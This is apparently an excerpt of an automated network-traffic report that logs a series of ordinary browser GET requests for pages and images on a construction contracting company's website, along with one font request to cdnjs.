Source: global trafficHTTP traffic detected: GET /uploads/dynamic/11/a8f19a8ddc204498fd4867850bfee67c.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/captcha.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/cdcicon.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/contactAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/cdcicon.png HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /about HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/6/d1cf623cfda2ed689fc6281afcfa75de.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/aboutAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/bg/14.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/aboutAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /certifications HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/certifications/1/c3477d31049b9b96e47ca0d2bf05bcdb.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/9/296e3d1f4ce8845a75130582a997c1a7.gif HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/bg/14.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0Range: bytes=135930-135930If-Range: Fri, 30 Dec 2022 22:22:48 GMT
Source: global trafficHTTP traffic detected: GET /uploads/certifications/2/4e78ca5f7dd4e2d66f3b7d895ae18bd3.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/certifications/1/c3477d31049b9b96e47ca0d2bf05bcdb.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/bg/14.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/certificationsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0Range: bytes=135930-165417If-Range: Fri, 30 Dec 2022 22:22:48 GMT
Source: global trafficHTTP traffic detected: GET /uploads/certifications/3/b28c762ff89177dacd4852c7b909ca34.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/certifications/2/4e78ca5f7dd4e2d66f3b7d895ae18bd3.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/dynamic/9/296e3d1f4ce8845a75130582a997c1a7.gif HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /images/bg/14.jpg HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /projects HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/1/c10a34a38c54c09dea6d4e76cb363989.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.2.1/webfonts/fa-v4compatibility.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.citydiamondcontracting.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uploads/projects/5/37ea8047a2494b50f7dc694b8f8dcf37.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/6/f8dd4bffdef039afd52cc92797706540.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/7/21d631acc2ddb0fc3dcf4f737c53f9da.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/8/0c298f1956a31b39bf820e0dd7ec632b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/22/99d0794491cfd3b80cd8a673e31ef7e3.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/17/e7dd25a6640aa7bddcdaf018fbb5a7f2.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/19/f8a20d10a257c0d0108fbe993c55b0fa.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/10/579de64f97d717521a5fc6fcc0eaa118.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/15/6a0a747aec6891a7650e250b247f7939.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/34/2df040a4c38aa8d8468943fbef9cc703.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/12/99cc5d257a0d7f25b4541a6275919c83.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/16/f2e9aef4e6dba3f5ab1fba99f80ec53b.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/18/d4358b3300881d66d5be0da1f9c2ed79.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/9/da3ea8845675faf87c497231993e7480.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/13/ede6b29ab48bcd7727bef37740e56b13.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
Source: global trafficHTTP traffic detected: GET /uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp HTTP/1.1Host: www.citydiamondcontracting.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.citydiamondcontracting.com/projectsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
